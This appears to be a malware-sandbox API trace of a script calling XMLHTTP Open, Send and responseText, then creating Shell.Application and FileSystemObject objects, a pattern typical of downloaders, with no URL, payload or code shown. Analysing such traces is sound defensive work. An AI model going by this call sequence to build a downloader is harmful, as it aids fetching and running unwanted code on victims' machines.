	[0367.160] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0367.160] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0367.160] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0367.160] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0367.160] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0367.161] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0367.161] SysStringLen (param_1=0x0) returned 0x0
	[0367.161] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0367.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0367.161] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c40) returned 0x0
	[0367.161] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0367.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0367.161] ??2@YAPEAX_K@Z () returned 0x62f330
	[0367.161] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0367.161] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0367.161] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0367.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c40) returned 0x0
	[0367.161] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c40) returned 0x3
	[0367.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0367.161] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0367.161] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0367.161] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0367.161] SysStringLen (param_1=0x0) returned 0x0
	[0367.161] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0367.162] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0367.162] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77c0) returned 0x0
	[0367.162] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0367.162] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7828) returned 0x0
	[0367.162] ??2@YAPEAX_K@Z () returned 0x62f310
	[0367.162] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7828, pUnkSite=0x62f310) 
	[0367.162] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0367.162] XMLHTTPRequest:IUnknown:Release (This=0x49c7828) returned 0x0
	[0367.162] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77c0) returned 0x0
	[0367.162] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77c0) returned 0x3
	[0367.162] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0367.162] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0367.162] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0367.162] longjmp () 
	[0367.162] longjmp () 
	[0367.162] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0367.162] SysStringLen (param_1=0x0) returned 0x0
	[0367.162] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0367.162] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0367.163] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0367.163] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0367.163] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0367.163] ??2@YAPEAX_K@Z () returned 0x62f330
	[0367.163] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0367.163] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0367.163] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0367.163] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0367.163] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0367.163] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0367.163] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0367.163] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0367.163] longjmp () 
	[0367.163] longjmp () 
	[0367.163] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0367.163] SysStringLen (param_1=0x0) returned 0x0
	[0367.163] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0367.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0367.164] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0367.164] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0367.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0367.164] ??2@YAPEAX_K@Z () returned 0x62f310
	[0367.164] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0367.164] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0367.164] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0367.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0367.164] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0367.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0367.164] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0367.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0367.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0367.164] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0367.164] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0368.493] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0368.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0368.494] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0368.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0368.494] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0368.494] SysStringLen (param_1=0x0) returned 0x0
	[0368.494] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0368.494] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0368.494] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0368.494] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0368.494] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0368.494] ??2@YAPEAX_K@Z () returned 0x62f350
	[0368.494] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0368.494] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0368.494] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0368.494] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0368.494] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0368.495] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0368.495] SysStringLen (param_1=0x0) returned 0x0
	[0368.495] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0368.498] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0368.498] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0368.498] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0368.498] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
